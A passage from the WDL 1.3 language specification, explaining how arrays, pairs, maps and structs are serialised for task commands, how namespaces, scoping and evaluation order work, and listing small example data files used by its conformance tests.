#Int sint = read_int("str_file")
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{
"read_write_primitives.s": "hello",
"read_write_primitives.i": 42
}
Example output:
{
"read_write_primitives.sout": "hello",
"read_write_primitives.istr": "42",
"read_write_primitives.iout": 42
}
Compound Values
A compound value such as Array or Map must be serialized to a string before it can be used in the command. There are a two general strategies for converting a compound value to a string:
- JSON: most compound values can be written to JSON format using
write_json. - Delimitation: convert each element of the compound value to a string, then join them together into a single string using a delimiter. Some common approaches are:
- Separate values by a tool-specific delimiter (e.g., whitespace or comma) and pass the string as a single command line argument. This can be accomplished with the
sepfunction. - Prefix each value with a command line option. This can be accomplished with the
prefixfunction. - Separate values by newlines (
\n) and write them to a file. This can be accomplished with thewrite_linesfunction. - For nested types such as
Structs andObject, separate the fields of each value with a tab (\t), and write each tab-delimited line to a file. This is commonly called tab_separated value (TSV) format. This can be accomplished usingwrite_tsv,write_map,write_object, orwrite_objects.
- Separate values by a tool-specific delimiter (e.g., whitespace or comma) and pass the string as a single command line argument. This can be accomplished with the
Similarly, data output by a command must be deserialized to be used in WDL. Commands generally either write output to stdout (or sometimes stderr) or to a regular file. The contents of stdout and stderr can be read a files using the stdout and stderr functions. The two general strategies for deserializing data from a file are:
- If the output is in JSON format, it can be read into a WDL value using
read_json. - If the output is line-oriented (i.e., one value per line), it can be read into a WDL
Arrayusingread_lines. - If the output is tab-delimited (TSV), it can be read into a structured value using
read_tsv,read_map,read_object, orread_objects.
Specific examples of serializing and deserializing each type of compound value are given below.
Array
Array serialization by delimitation
This method applies to an array of a primitive type. Each element of the array is coerced to a string, and the strings are then joined into a single string separated by a delimiter. This is done using the sep function.
Example: serialize_array_delim_task.wdl
version 1.3
task serialize_array_delim {
input {
File infile
Array[Int] counts
}
Array[String] args = squote(prefix("-n", counts))
command <<<
for arg in ~{sep(" ", args)}; do
head $arg ~{infile}
done
>>>
output {
Array[String] heads = read_lines(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task serialize_array_delim {
input {
File infile
Array[Int] counts
}
Array[String] args = squote(prefix("-n", counts))
command <<<
for arg in ~{sep(" ", args)}; do
head $arg ~{infile}
done
>>>
output {
Array[String] heads = read_lines(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{
"serialize_array_delim.infile": "data/greetings.txt",
"serialize_array_delim.counts": [1, 2]
}
Example output:
{
"serialize_array_delim.heads": [
"hello world",
"hello world",
"hi_world"
]
}
Given an array [1, 2], the instantiated command would be:
for arg in '-n1' '-n2'; do
head $arg greetings.txt
done
Array serialization/deserialization using write_lines()/read_lines()
This method applies to an array of a primitive type. Using write_lines, Each element of the array is coerced to a string, and the strings are written to a file, one element per line. Using read_lines, each line of the file is read as a String and coerced to the target type.
Example: serde_array_lines_task.wdl
version 1.3
task serde_array_lines {
input {
File infile
Array[String] patterns
}
command <<<
while read -r pattern; do
grep -c "$pattern" ~{infile}
done < ~{write_lines(patterns)}
>>>
output {
Array[String] matches = read_lines(stdout())
}
}
version 1.3
task serde_array_lines {
input {
File infile
Array[String] patterns
}
command <<<
while read -r pattern; do
grep -c "$pattern" ~{infile}
done < ~{write_lines(patterns)}
>>>
output {
Array[String] matches = read_lines(stdout())
}
}
Example input:
{
"serde_array_lines.infile": "data/greetings.txt",
"serde_array_lines.patterns": ["hello", "world"]
}
Example output:
{
"serde_array_lines.matches": ["2", "2"]
}
Given an array of patterns ["hello", "world"], the instantiated command would be:
while read pattern; do
grep "$pattern" greetings.txt | wc -l
done < /jobs/564758/patterns
Where /jobs/564758/patterns contains:
hello
world
Array serialization/deserialization using write_json()/read_json()
This method applies to an array of any type that can be serialized to JSON. Calling write_json with an Array parameter results in the creation of a file containing a JSON array.
Example: serde_array_json_task.wdl
version 1.3
task serde_array_json {
input {
Map[String, Int] string_to_int
}
command <<<
python <<CODE
import json
import sys
with open("~{write_json(string_to_int)}") as j:
d = json.load(j)
json.dump(list(d.keys()), sys.stdout)
CODE
>>>
output {
Array[String] keys = read_json(stdout())
}
requirements {
container: "python:latest"
}
}
version 1.3
task serde_array_json {
input {
Map[String, Int] string_to_int
}
command <<<
python <<CODE
import json
import sys
with open("~{write_json(string_to_int)}") as j:
d = json.load(j)
json.dump(list(d.keys()), sys.stdout)
CODE
>>>
output {
Array[String] keys = read_json(stdout())
}
requirements {
container: "python:latest"
}
}
Example input:
{
"serde_array_json.string_to_int": {
"a": 1,
"b": 2
}
}
Example output:
{
"serde_array_json.keys": ["a", "b"]
}
Given the Map {"a": 1, "b": 2}, the instantiated command would be:
import json
import sys
with open("/jobs/564758/string_to_int.json") as j:
d = json.load(j)
json.dump(list(d.keys()), sys.stdout)
Where /jobs/564758/string_to_int.json would contain:
{
"a": 1,
"b": 2
}
Pair
A Pair cannot be directly serialized to a String, nor can it be deserialized from a string or a file.
The most common approach to Pair serialization is to serialize the left and right values separately, e.g., by converting each to a String or writing each to a separate file using one of the write_* functions. Similarly, two values can be deserialized independently and then used to create a Pair.
Example: serde_pair.wdl
version 1.3
task tail {
input {
Pair[File, Int] to_tail
}
command <<<
tail -n ~{to_tail.right} ~{to_tail.left}
>>>
output {
Array[String] lines = read_lines(stdout())
}
}
workflow serde_pair {
input {
Map[File, Int] to_tail
}
scatter (item in as_pairs(to_tail)) {
call tail {
to_tail = item
}
Pair[String, String]? two_lines =
if item.right >= 2 then (tail.lines[0], tail.lines[1]) else None
}
output {
Map[String, String] tails_of_two = as_map(select_all(two_lines))
}
}
version 1.3
task tail {
input {
Pair[File, Int] to_tail
}
command <<<
tail -n ~{to_tail.right} ~{to_tail.left}
>>>
output {
Array[String] lines = read_lines(stdout())
}
}
workflow serde_pair {
input {
Map[File, Int] to_tail
}
scatter (item in as_pairs(to_tail)) {
call tail {
to_tail = item
}
Pair[String, String]? two_lines =
if item.right >= 2 then (tail.lines[0], tail.lines[1]) else None
}
output {
Map[String, String] tails_of_two = as_map(select_all(two_lines))
}
}
Example input:
{
"serde_pair.to_tail": {
"data/cities.txt": 2,
"data/hello.txt": 1
}
}
Example output:
{
"serde_pair.tails_of_two": {
"Chicago": "Piscataway"
}
}
Homogeneous Pair serialization/deserialization as Array
A homogeneous Pair[X, X] can be converted to/from an Array and then serialized/deserialized by any of the methods in the previous section.
Example: serde_homogeneous_pair.wdl
version 1.3
task serde_int_strings {
input {
Pair[String, String] int_strings
}
Array[String] pair_array = [int_strings.left, int_strings.right]
command <<<
cat ~{write_lines(pair_array)}
>>>
output {
Array[String] ints = read_lines(stdout())
}
}
workflow serde_homogeneous_pair {
input {
Map[String, String] int_strings
}
scatter (pair in as_pairs(int_strings)) {
call serde_int_strings { int_strings = pair }
}
output {
Array[String] ints = flatten(serde_int_strings.ints)
}
}
version 1.3
task serde_int_strings {
input {
Pair[String, String] int_strings
}
Array[String] pair_array = [int_strings.left, int_strings.right]
command <<<
cat ~{write_lines(pair_array)}
>>>
output {
Array[String] ints = read_lines(stdout())
}
}
workflow serde_homogeneous_pair {
input {
Map[String, String] int_strings
}
scatter (pair in as_pairs(int_strings)) {
call serde_int_strings { int_strings = pair }
}
output {
Array[String] ints = flatten(serde_int_strings.ints)
}
}
Example input:
{
"serde_homogeneous_pair.int_strings": {
"1": "2",
"3": "4"
}
}
Example output:
{
"serde_homogeneous_pair.ints": ["1", "2", "3", "4"]
}
Pair serialization/deserialization using read_json/write_json
A Pair[X, Y] can be converted to JSON and then serialized using write_json and deserialized using read_json.
Map
Map serialization by delimitation
A Map is a common way to represent a set of arguments that need to be passed to a command. Each key/value pair can be converted to a String using a scatter, or the keys and value can be independently converted to Bash arrays and referenced by index.
Example: serialize_map.wdl
version 1.3
task grep1 {
input {
File infile
String pattern
Array[String] args
}
command <<<
grep ~{sep(" ", args)} ~{pattern} ~{infile}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
task grep2 {
input {
File infile
String pattern
Map[String, String] args
}
Pair[Array[String], Array[String]] opts_and_values = unzip(as_pairs(args))
Int n = length(opts_and_values.left)
command <<<
opts=( ~{sep(" ", quote(opts_and_values.left))} )
values=( ~{sep(" ", quote(opts_and_values.right))} )
command="grep"
for i in {0..~{n-1}}; do
command="$command ${opts[i]}"="${values[i]}"
done
$command ~{pattern} ~{infile}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
workflow serialize_map {
input {
File infile
String pattern
Map[String, String] args
}
scatter (arg in as_pairs(args)) {
String arg_str = "~{arg.left}=~{arg.right}"
}
call grep1 { infile, pattern, args = arg_str }
call grep2 { infile, pattern, args }
output {
Array[String] results1 = grep1.results
Array[String] results2 = grep2.results
}
}
version 1.3
task grep1 {
input {
File infile
String pattern
Array[String] args
}
command <<<
grep ~{sep(" ", args)} ~{pattern} ~{infile}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
task grep2 {
input {
File infile
String pattern
Map[String, String] args
}
Pair[Array[String], Array[String]] opts_and_values = unzip(as_pairs(args))
Int n = length(opts_and_values.left)
command <<<
opts=( ~{sep(" ", quote(opts_and_values.left))} )
values=( ~{sep(" ", quote(opts_and_values.right))} )
command="grep"
for i in {0..~{n-1}}; do
command="$command ${opts[i]}"="${values[i]}"
done
$command ~{pattern} ~{infile}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
workflow serialize_map {
input {
File infile
String pattern
Map[String, String] args
}
scatter (arg in as_pairs(args)) {
String arg_str = "~{arg.left}=~{arg.right}"
}
call grep1 { infile, pattern, args = arg_str }
call grep2 { infile, pattern, args }
output {
Array[String] results1 = grep1.results
Array[String] results2 = grep2.results
}
}
Example input:
{
"serialize_map.infile": "data/greetings.txt",
"serialize_map.pattern": "hello",
"serialize_map.args": {
"--after-context": "1",
"--max-count": "1"
}
}
Example output:
{
"serialize_map.results1": ["hello world", "hi_world"],
"serialize_map.results2": ["hello world", "hi_world"]
}
Map serialization/deserialization using write_map()/read_map()
A Map[String, String] value can be serialized as a two-column TSV file using write_map, and deserialized from a two-column TSV file using read_map.
Example: serde_map_tsv_task.wdl
version 1.3
task serde_map_tsv {
input {
Map[String, String] items
}
File item_file = write_map(items)
command <<<
cut -f 1 ~{item_file} >> lines
cut -f 2 ~{item_file} >> lines
paste -s -d '\t\n' lines
>>>
output {
Map[String, String] new_items = read_map(stdout())
}
}
version 1.3
task serde_map_tsv {
input {
Map[String, String] items
}
File item_file = write_map(items)
command <<<
cut -f 1 ~{item_file} >> lines
cut -f 2 ~{item_file} >> lines
paste -s -d '\t\n' lines
>>>
output {
Map[String, String] new_items = read_map(stdout())
}
}
Example input:
{
"serde_map_tsv.items": {
"a": "b",
"c": "d",
"e": "f"
}
}
Example output:
{
"serde_map_tsv.new_items": {
"a": "c",
"e": "b",
"d": "f"
}
}
Given a Map { "a": "b", "c": "d", "e": "f" }, the instantiated command would be:
cut -f 1 /jobs/564757/item_file >> lines
cut -f 2 /jobs/564757/item_file >> lines
paste -s -d '\t\n' lines
Where /jobs/564757/item_file would contain:
a\tb
c\td
e\tf
And the created lines file would contain:
a\tc,
e\tb,
d\tf
Which is deserialized to the Map {"a": "c", "e": "b", "d": "f"}.
Map serialization/deserialization using write_json()/read_json()
A Map[String, Y] value can be serialized as a JSON object using write_json, and a JSON object can be read into a Map[String, Y] using read_json so long as all the values of the JSON object are coercible to Y.
Example: serde_map_json_task.wdl
version 1.3
task serde_map_json {
input {
Map[String, Int] read_quality_scores
}
command <<<
python <<CODE
import json
import sys
with open("~{write_json(read_quality_scores)}") as j:
d = json.load(j)
for key in d.keys():
d[key] += 33
json.dump(d, sys.stdout)
CODE
>>>
output {
Map[String, Int] ascii_values = read_json(stdout())
}
requirements {
container: "python:latest"
}
}
version 1.3
task serde_map_json {
input {
Map[String, Int] read_quality_scores
}
command <<<
python <<CODE
import json
import sys
with open("~{write_json(read_quality_scores)}") as j:
d = json.load(j)
for key in d.keys():
d[key] += 33
json.dump(d, sys.stdout)
CODE
>>>
output {
Map[String, Int] ascii_values = read_json(stdout())
}
requirements {
container: "python:latest"
}
}
Example input:
{
"serde_map_json.read_quality_scores": {
"read1": 32,
"read2": 41,
"read3": 55
}
}
Example output:
{
"serde_map_json.ascii_values": {
"read1": 65,
"read2": 74,
"read3": 88
}
}
Given a Map { "read1": 32, "read2": 41, "read3": 55 }, the instantiated command would be:
import json
import sys
with open("/jobs/564757/sample_quality_scores.json") as j:
d = json.load(j)
for key in d.keys():
d[key] += 33
json.dump(d, sys.stdout)
Where /jobs/564757/sample_quality_scores.json would contain:
{
"read1": 32,
"read2": 41,
"read3": 55,
}
Struct and Object serialization/deserialization
There are two alternative serialization formats for Structs and `Objects:
- JSON:
Structs andObjects are serialized identically usingwrite_json. A JSON object is deserialized to a WDLObjectusingread_json, which can then be coerced to aStructtype if necessary. - TSV:
Structs andObjects can be serialized to TSV format usingwrite_object. The generated file has two lines tab-delimited: a header with the member names and the values, which must be coercible toStrings. An array ofStructs orObjects can be written usingwrite_objects, in which case the generated file has one line of values for each struct/object.Structs andObjects can be deserialized from the same TSV format usingread_object/read_objects. Object member values are always of typeStringwhereas struct member types must be coercible fromString.
Appendix B: WDL Namespaces and Scopes
Namespaces and scoping in WDL are somewhat complex topics, and some aspects are counter-intuitive for users coming from backgrounds in other programming languages. This section goes into deeper details on these topics.
Namespaces
The following WDL namespaces exist:
- WDL document
- The namespace of an imported document equals that of the basename of the imported file by default, but may be aliased using the
as <identifier>syntax. - A WDL document may contain a
workflowand/ortasks, which are names within the document's namespace. - A WDL document may contain
structs andenums, which are also names within the document's namespace and usable as types in any declarations. Structs and enums from any imported documents are copied into the document's namespace and may be aliased using thealias <source name> as <new name>syntax.
- The namespace of an imported document equals that of the basename of the imported file by default, but may be aliased using the
- A WDL
taskis a namespace consisting of:input,output, and private declarations- A
requirementsnamespace that contains all the runtime requirements
- A WDL
workflowis a namespace consisting of:input,output, and private declarations- The
calls made to tasks and subworkflows within the body of the workflow.- A call is itself a namespace that equals the name of the called task or subworkflow by default, but may be aliased using the
as <identifier>syntax. - A call namespace contains the output declarations of the called task or workflow.
- A call is itself a namespace that equals the name of the called task or subworkflow by default, but may be aliased using the
- The body of each nested element (
structorifstatement).
- A
Structinstance: is a namespace consisting of the members defined in the struct. This also applies toObjectinstances.
All members of a namespace must be unique within that namespace. For example:
- Two documents cannot be imported while they have the same namespace identifier - at least one of them would need to be aliased.
- A workflow and a namespace both named
foocannot exist inside a common namespace. - There cannot be a call
fooin a workflow also namedfoo.
However, two sub-namespaces imported into the same parent namespace are allowed to contain the same names. For example, two documents with different namespace identifiers foo and bar can both have a task named baz, because the fully-qualified names of the two tasks would be different: foo.baz and bar.baz.
Scopes
A "scope" is associated with a level of nesting within a namespace. The visibility of WDL document elements is governed by their scope, and by WDL's scoping rules, which are explained in this section.
Global Scope
A WDL document is the top-level (or "outermost") scope. All elements defined within a document that are not nested inside other elements are in the global scope and accessible from anywhere in the document. The elements that may be in a global scope are:
- A
workflow - Any number of
tasks - Imported namespaces
- All
structs andenums defined in the document and in any imported documents
Task Scope
A task scope consists of all the declarations in the task input section and in the body of the task. The input section is used only to delineate which declarations are visible outside the task (i.e., they are part of the task's namespace) and which are private to the task. Input declarations may reference private declarations, and vice-versa. Declarations in the task scope may be referenced in expressions anywhere in the task (i.e., command, requirements, and output sections).
The output section can be considered a nested scope within the task. Expressions in the output scope may reference declarations in the task scope, but the reverse is not true. This is because declarations in the task scope are evaluated when a task is invoked (i.e., before it's command is evaluated and executed), while declarations in the output scope are only evaluated after execution of the command is completed.
For example, in this task:
version 1.3
task my_task {
input {
Int x
File f
}
Int y = x + 1
command <<<
my_cmd --integer1=~{x} --integer2=~{y} ~{f}
>>>
output {
Int z = read_int(stdout())
Int z_plus_one = z + 1
}
requirements {
memory: "~{y} GB"
}
}
xandfareinputvalues that are evaluated when the task is invoked.yis an private declaration with a dependency on the inputx.- The
commandreferences bothinputand private declarations. However, it would be an error for thecommandto referencez. zis anoutputdeclaration.z_plus_oneis also anoutputdeclaration - it references another output declarationz.- In the
runtimesection, attribute values may be expressions that reference declarations in the task body. The value ofmemoryis determined using the value ofy.
Workflow Scope
A workflow scope consists of:
- Declarations in the workflow
inputsection. - Private declarations in the body of the workflow.
- Calls in the workflow.
- Declarations and call outputs that are exported from nested scopes within the workflow (i.e., scatters and conditionals).
Just like in the task scope, all declarations in the workflow scope can reference each other, and the output section is a nested scope that has access to - but cannot be accessed from - the workflow scope.
For example, in this workflow (which calls the my_task task from the previous example):
workflow my_workflow {
input {
File file
Int x = 2
}
call my_task {
x = x,
f = file
}
output {
Int z = my_task.z
}
}
fileandxareinputdeclarations that are evaluated when the workflow is invoked.- The call body provides inputs for the task values
xandf. Note thatxis used twice in the linex = x:- First: to name the value in the task being provided. This must reference an input declaration in the namespace of the called task.
- Second: as part of the input expression. This expression may reference any values in the current workflow scope.
zis an output declaration that depends on the output from thecalltomy_task. It is not accessible from elsewhere outside theoutputsection.
Workflows can have (potentially nested) scatters and conditionals, each of which has a body that defines a nested scope. A nested scope can have declarations, calls, scatters, and conditionals (which create another level of nested scope). The declarations and calls in a nested scope are visible within that scope and within any sub-scopes, recursively.
Every nested scope implicitly "exports" all of its declarations and call outputs in the following manner:
- A scatter scope exports its declarations and calls with the same names they have inside the scope, but with their types modified, such that the exported types are all
Array[X], whereXis the type of the declaration within the scope.- A scatter scope does not export its scatter variable. For example, the
xvariable inscatter (x in array)is only accessible from within the scatter scope and any nested scopes; it is not accessible outside of the scatter scope.
- A scatter scope does not export its scatter variable. For example, the
- A conditional scope exports its declarations and calls with the same names they have inside the scope, but with their types modified, such that the exported types are all
X?, whereXis the type of the declaration within the scope.
For example: in this workflow (which scatters over the my_task task from the previous examples):
workflow my_workflow {
input {
File file
Array[Int] xs = [1, 2, 3]
}
scatter (x in xs) {
call my_task {
x = x,
f = file
}
Int z = my_task.z
}
output {
Array[Int] zs = z
}
}
- The expression for
Int z = ...accessesmy_task.zfrom within the same scatter. - The output
zsreferenceszeven though it was declared in a sub-section. However, becausezis declared within ascatterbody, the type ofzsisArray[Int]outside of that scatter.
The concept of a single name within a workflow having different types depending on where it appears can be confusing at first, and it helps to think of these as two different variables. When the user makes a declaration within a nested scope, they are essentially reserving that name in all of the higher-level scopes so that it cannot be reused.
For example, the following workflow is invalid:
workflow invalid {
Boolean b = true
scatter {
String x = "hello"
}
# The scatter exports x to the top-level scope - there is an implicit
# declaration `Array[String] x` here that is reserved to hold the
# exported value and cannot be used by any other declaration in this scope.
if (b) {
# error! `x` is already reserved in the top-level scope to hold the exported
# value of `x` from the scatter, so we cannot reserve it here
Float x = 1.0
}
# error! `x` is already reserved
Int x = 5
}
Cyclic References
In addition to following the scoping rules, all references to declarations must be acyclic. In other words, if each declarations in a scope were placed as a node in a graph with directed edges to all of the declarations referenced in its initializer expression, then the WDL would only be valid if there were no cycles in that graph.
For example, this is an example of an invalid workflow due to cyclic references:
task mytask {
input {
Int inp
}
command <<< >>>
output {
Int out = inp * 2
}
}
workflow cyclic {
input {
Int i = j + 1
}
Int j = mytask.out - 2
call mytask { inp = i }
}
Here, i references j in its initializer expression; j references the output of mytask in its initializer expression; and the call to mytask requires the value of i. The graph would be cyclic:
i -> j -> mytask
^ |
|____________|
Since i cannot be evaluated until j is evaluated, and j cannot be evaluated until the call to mytask completes, and the call to mytask cannot be invoked until the value of i is available, trying to execute this workflow would result in a deadlock.
Cycles can be tricky to detect, for example when they occur between declarations in different scopes within a workflow. For example, here is a workflow with one block that references a declaration that originates in another block:
workflow my_workflow {
input {
Array[Int] as
Array[Int] bs
}
scatter (a in as) {
Int x_a = a
}
scatter (b in bs) {
Array[Int] x_b = x_a
}
output {
Array[Array[Int]] xs_output = x_b
}
}
- The declaration for
x_bis able to access the value forx_aeven though the declaration is in another sub-section of the workflow. - Because the declaration for
x_bis outside thescatterin whichx_awas declared, the type isArray[Int]
The following change introduces a cyclic dependency between the scatters:
workflow my_workflow {
input {
Array[Int] as
Array[Int] bs
}
scatter (a in as) {
Int x_a = a
Array[Int] y_a = y_b
}
scatter (b in bs) {
Array[Int] x_b = x_a
Int x_b = b
}
output {
Array[Array[Int]] xs_output = x_b
Array[Array[Int]] ys_output = y_a
}
}
The dependency graph now has cyclic dependencies between elements in the scatter (a in as) and scatter (b in bs) bodies, which is not allowed. One way to avoid such cyclic dependencies would be to create two separate scatters over the same input array:
workflow my_workflow {
input {
Array[Int] as
Array[Int] bs
}
scatter (a in as) {
Int x_a = a
}
scatter (b in bs) {
Array[Int] x_b = x_a
Int x_b = b
}
scatter (a2 in as) {
Array[Int] y_a = y_b
}
output {
Array[Array[Int]] xs_output = x_b
Array[Array[Int]] ys_output = y_a
}
}
Namespaces without Scope
Elements such as structs and task requirements sections are namespaces, but they lack scope because their members cannot reference each other. For example, one member of a struct cannot reference another member in that struct, nor can a requirements attribute reference another attribute.
Evaluation Order
A key concept in WDL is: the order in which statements are evaluated depends on the availability of their dependencies, not on the linear orderering of the statements in the document.
All values in tasks and workflows can be evaluated as soon as - but not before - their expression inputs are available; beyond this, it is up to the execution engine to determine when to evaluate each value.
Remember that, in tasks, the command section implicitly depends on all the input and private declarations in the task, and the output section implicitly depends on the command section. In other words, the command section cannot be instantiated until all input and private declarations are evaluated, and the output section cannot be evaluated until the command successfully completes execution. This is true even for private declarations that follow the command positionally in the file.
A "forward reference" occurs when an expression refers to a declaration that occurs at a later position in the WDL file. Given the above cardinal rule of evaluation order, forward references are allowed, so long as all declarations can ultimately be processed as an acyclic graph.
For example, this is a valid workflow:
workflow my_workflow {
input {
File file
Int x = 2
String s = my_task.out2
}
call my_task {
x = x_modified,
f = file
}
Int x_modified = x
output {
Array[String] out = [my_task.out1, s]
}
}
The dependencies are:
* x_modified -> x
* my_task -> (x_modified, f)
* s -> my_task
* out -> (my_task, s)
There are no cycles in this dependency graph; thus, this workflow is valid, although perhaps not as readable as it could be with better organization.
Appendix C: Example Data
This appendix contains example data files that are used in conformance tests throughout the specification.
Resource: cities.txt
Houston
Chicago
Piscataway
Houston
Chicago
Piscataway
Resource: comment.txt
# this is a comment
A
B
C
# this is a comment
A
B
C
Resource: greetings.txt
hello world
hi_world
hello nurse
hello world
hi_world
hello nurse
Resource: hello.txt
hello
hello
Resource: questions.txt
What is the meaning of life?
How do I exit vim?
Why is the sky blue?
What is the meaning of life?
How do I exit vim?
Why is the sky blue?
Resource: answers.txt
42
Press ESC then type :q!
Rayleigh scattering
42
Press ESC then type :q!
Rayleigh scattering
Resource: request.txt
GET /hello HTTP/1.1
Host: example.com
GET /hello HTTP/1.1
Host: example.com
Resource: response.txt
HTTP/1.1 200 OK
Content-Type: text/plain
Hello, World!
HTTP/1.1 200 OK
Content-Type: text/plain
Hello, World!
Resource: wizard.txt
Gandalf the Grey
Merlin
Albus Dumbledore
Gandalf the Grey
Merlin
Albus Dumbledore
Resource: spell.txt
You shall not pass!
Abracadabra
Expecto Patronum
You shall not pass!
Abracadabra
Expecto Patronum
Resource: testdir/example.txt
This is an example file in a subdirectory.
This is an example file in a subdirectory.
Resource: person.json
{
"name": "John",
"age": 42
}
{
"name": "John",
"age": 42
}